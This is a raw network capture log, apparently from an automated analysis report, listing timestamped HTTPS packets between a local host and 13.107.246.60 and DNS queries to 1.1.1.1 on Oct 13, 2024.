                                                                                                                          Oct 13, 2024 18:21:59.715506077 CEST49941443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.715532064 CEST4434994113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.715544939 CEST4434994113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.718744040 CEST49946443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.718784094 CEST4434994613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.719635010 CEST49946443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.719791889 CEST49946443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.719808102 CEST4434994613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.743012905 CEST4434994313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.743204117 CEST4434994313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.743294001 CEST49943443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.743294001 CEST49943443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.743407011 CEST49943443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.743423939 CEST4434994313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.745095968 CEST49947443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.745184898 CEST4434994713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.745364904 CEST49947443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.745364904 CEST49947443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.745445013 CEST4434994713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.748105049 CEST4434994213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.748202085 CEST4434994213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.748389006 CEST49942443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.748389006 CEST49942443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.749047995 CEST49942443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.749063015 CEST4434994213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.750519037 CEST49948443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.750550032 CEST4434994813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.751238108 CEST49948443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.751360893 CEST49948443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.751374006 CEST4434994813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.779997110 CEST4434994413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.780154943 CEST4434994413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.780299902 CEST49944443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.780374050 CEST49944443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.780374050 CEST49944443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.780412912 CEST4434994413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.780440092 CEST4434994413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.782649040 CEST49949443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.782740116 CEST4434994913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.782917976 CEST49949443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.782917976 CEST49949443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.782985926 CEST4434994913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.816333055 CEST4434994513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.816423893 CEST4434994513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.816540003 CEST4434994513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.816626072 CEST49945443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.816626072 CEST49945443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.816674948 CEST49945443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.816674948 CEST49945443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.816695929 CEST4434994513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.816709042 CEST4434994513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.818661928 CEST49950443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.818694115 CEST4434995013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:21:59.818870068 CEST49950443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.818870068 CEST49950443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:21:59.818917990 CEST4434995013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.385945082 CEST4434994613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.386394978 CEST49946443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.386420965 CEST4434994613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.386975050 CEST49946443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.386982918 CEST4434994613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.398845911 CEST4434994813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.399255037 CEST49948443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.399267912 CEST4434994813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.399693966 CEST49948443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.399698973 CEST4434994813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.445559978 CEST4434994913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.445971966 CEST49949443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.446007013 CEST4434994913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.446408033 CEST49949443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.446415901 CEST4434994913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.448595047 CEST4434994713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.448929071 CEST49947443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.448951960 CEST4434994713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.449285984 CEST49947443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.449291945 CEST4434994713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.488925934 CEST4434994613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.488984108 CEST4434994613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.489125013 CEST49946443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.489308119 CEST49946443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.489336014 CEST4434994613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.489353895 CEST49946443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.489362955 CEST4434994613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.492027998 CEST49951443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.492063999 CEST4434995113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.492146969 CEST49951443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.492285967 CEST49951443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.492305994 CEST4434995113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.499936104 CEST4434995013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.499986887 CEST4434994813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.500053883 CEST4434994813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.500106096 CEST49948443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.500236988 CEST49948443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.500248909 CEST4434994813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.500258923 CEST49948443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.500262976 CEST4434994813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.500328064 CEST49950443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.500360012 CEST4434995013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.500799894 CEST49950443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.500809908 CEST4434995013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.502412081 CEST49952443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.502420902 CEST4434995213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.502477884 CEST49952443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.502563953 CEST49952443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.502580881 CEST4434995213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.550599098 CEST4434994913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.550695896 CEST4434994913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.550811052 CEST4434994913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.550851107 CEST49949443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.550884962 CEST49949443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.550928116 CEST49949443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.550929070 CEST49949443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.550961971 CEST4434994913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.551002026 CEST4434994913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.552716970 CEST49953443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.552768946 CEST4434995313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.552835941 CEST49953443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.552930117 CEST49953443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.552947998 CEST4434995313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.568737030 CEST4434994713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.568810940 CEST4434994713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.568922997 CEST49947443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.568958998 CEST4434994713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.569000959 CEST4434994713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.569060087 CEST49947443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.569060087 CEST49947443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.569101095 CEST4434994713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.569133043 CEST49947443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.569149017 CEST4434994713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.571043968 CEST49954443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.571065903 CEST4434995413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.571145058 CEST49954443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.571258068 CEST49954443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.571278095 CEST4434995413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.605165958 CEST4434995013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.605887890 CEST4434995013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.606005907 CEST49950443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.606044054 CEST49950443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.606065989 CEST4434995013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.606089115 CEST49950443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.606101036 CEST4434995013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.608140945 CEST49955443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.608167887 CEST4434995513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:00.608223915 CEST49955443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.608362913 CEST49955443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:00.608376980 CEST4434995513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.182142019 CEST4434995113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.182616949 CEST49951443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.182627916 CEST4434995113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.182945967 CEST49951443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.182950974 CEST4434995113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.189877033 CEST4434995213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.190222025 CEST49952443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.190233946 CEST4434995213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.190620899 CEST49952443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.190624952 CEST4434995213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.243962049 CEST4434995313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.244657993 CEST49953443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.244657993 CEST49953443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.244700909 CEST4434995313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.244745016 CEST4434995313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.253690958 CEST4434995413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.254333019 CEST49954443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.254333019 CEST49954443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.254350901 CEST4434995413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.254384995 CEST4434995413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.279407024 CEST4434995513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.279732943 CEST49955443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.279751062 CEST4434995513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.280036926 CEST49955443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.280041933 CEST4434995513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.285186052 CEST4434995113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.285657883 CEST4434995113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.286102057 CEST49951443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.286124945 CEST49951443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.286124945 CEST49951443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.286139011 CEST4434995113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.286149025 CEST4434995113.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.288391113 CEST49956443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.288486958 CEST4434995613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.288677931 CEST49956443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.288677931 CEST49956443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.288770914 CEST4434995613.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.294773102 CEST4434995213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.294872999 CEST4434995213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.294933081 CEST49952443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.295084953 CEST49952443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.295089960 CEST4434995213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.295105934 CEST49952443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.295110941 CEST4434995213.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.296794891 CEST49957443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.296835899 CEST4434995713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.296967030 CEST49957443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.297069073 CEST49957443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.297085047 CEST4434995713.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.351069927 CEST4434995313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.351149082 CEST4434995313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.351219893 CEST49953443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.351512909 CEST49953443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.351512909 CEST49953443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.351541042 CEST4434995313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.351566076 CEST4434995313.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.353452921 CEST49958443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.353487968 CEST4434995813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.353652000 CEST49958443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.353677988 CEST49958443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.353683949 CEST4434995813.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.364160061 CEST4434995413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.364324093 CEST4434995413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.364404917 CEST49954443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.364404917 CEST49954443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.365900040 CEST49954443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.365911961 CEST4434995413.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.366254091 CEST49959443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.366297007 CEST4434995913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.366435051 CEST49959443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.366482973 CEST49959443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.366498947 CEST4434995913.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.380906105 CEST4434995513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.381014109 CEST4434995513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.381068945 CEST4434995513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.381081104 CEST49955443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.381150007 CEST49955443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.381150007 CEST49955443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.381525040 CEST49955443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.381530046 CEST4434995513.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.382991076 CEST49960443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.383023024 CEST4434996013.107.246.60192.168.2.4
                                                                                                                          Oct 13, 2024 18:22:01.383225918 CEST49960443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.383225918 CEST49960443192.168.2.413.107.246.60
                                                                                                                          Oct 13, 2024 18:22:01.383261919 CEST4434996013.107.246.60192.168.2.4
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 13, 2024 18:20:38.335711002 CEST53569801.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:38.335798025 CEST53500441.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:39.594141960 CEST53615941.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:39.639416933 CEST6213053192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:39.639632940 CEST5046953192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:39.648675919 CEST53504691.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:39.660646915 CEST53621301.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.277812004 CEST53584631.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.406183958 CEST6532253192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:40.406363010 CEST6373953192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:40.589960098 CEST53637391.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.589973927 CEST53653221.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.368359089 CEST5184253192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:41.368665934 CEST5568553192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:41.378402948 CEST53518421.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.383764029 CEST53556851.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.439424992 CEST53521451.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.440572023 CEST5494953192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:41.440720081 CEST6252553192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:41.441374063 CEST5817253192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:41.441494942 CEST5595953192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:41.447278976 CEST53549491.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.447977066 CEST53581721.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.447988987 CEST53625251.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.448956013 CEST53559591.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.449357986 CEST53631931.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.537261009 CEST53630441.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.667702913 CEST6388953192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:41.667855024 CEST5802853192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:41.823396921 CEST5567053192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:41.823523045 CEST5283853192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:41.830868006 CEST53556701.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.979862928 CEST53580281.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.981199980 CEST53638891.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.089859009 CEST53528381.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.113089085 CEST6176453192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:42.113240004 CEST6286853192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:42.120757103 CEST53617641.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.122647047 CEST53628681.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.126774073 CEST5908453192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:42.126908064 CEST5595653192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:42.133585930 CEST53590841.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.134793043 CEST53559561.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.322078943 CEST5658153192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:42.322148085 CEST5151853192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:42.328789949 CEST53515181.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.328857899 CEST53565811.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.989248991 CEST6332453192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:42.989377975 CEST5232353192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:42.993613005 CEST53510741.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.996263027 CEST53523231.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.996865988 CEST53633241.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.005243063 CEST53650911.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:43.579413891 CEST5351353192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:43.579550982 CEST6055953192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:44.099770069 CEST53605591.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.099806070 CEST53535131.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.200505018 CEST5597053192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:44.200819969 CEST4919553192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:44.207593918 CEST53559701.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.207943916 CEST53491951.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.471683979 CEST53526841.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.496129036 CEST5190653192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:44.496349096 CEST5818653192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:44.503547907 CEST53519061.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:44.504172087 CEST53581861.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.680454969 CEST6139053192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:45.680671930 CEST5044053192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:45.684071064 CEST4923353192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:45.684221029 CEST5062653192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:45.688349009 CEST53613901.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.688714027 CEST53504401.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.691283941 CEST53492331.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:45.691975117 CEST53506261.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.762578011 CEST5994253192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:46.762968063 CEST6012453192.168.2.41.1.1.1
                                                                                                                          Oct 13, 2024 18:20:46.769715071 CEST53599421.1.1.1192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:46.769746065 CEST53601241.1.1.1192.168.2.4
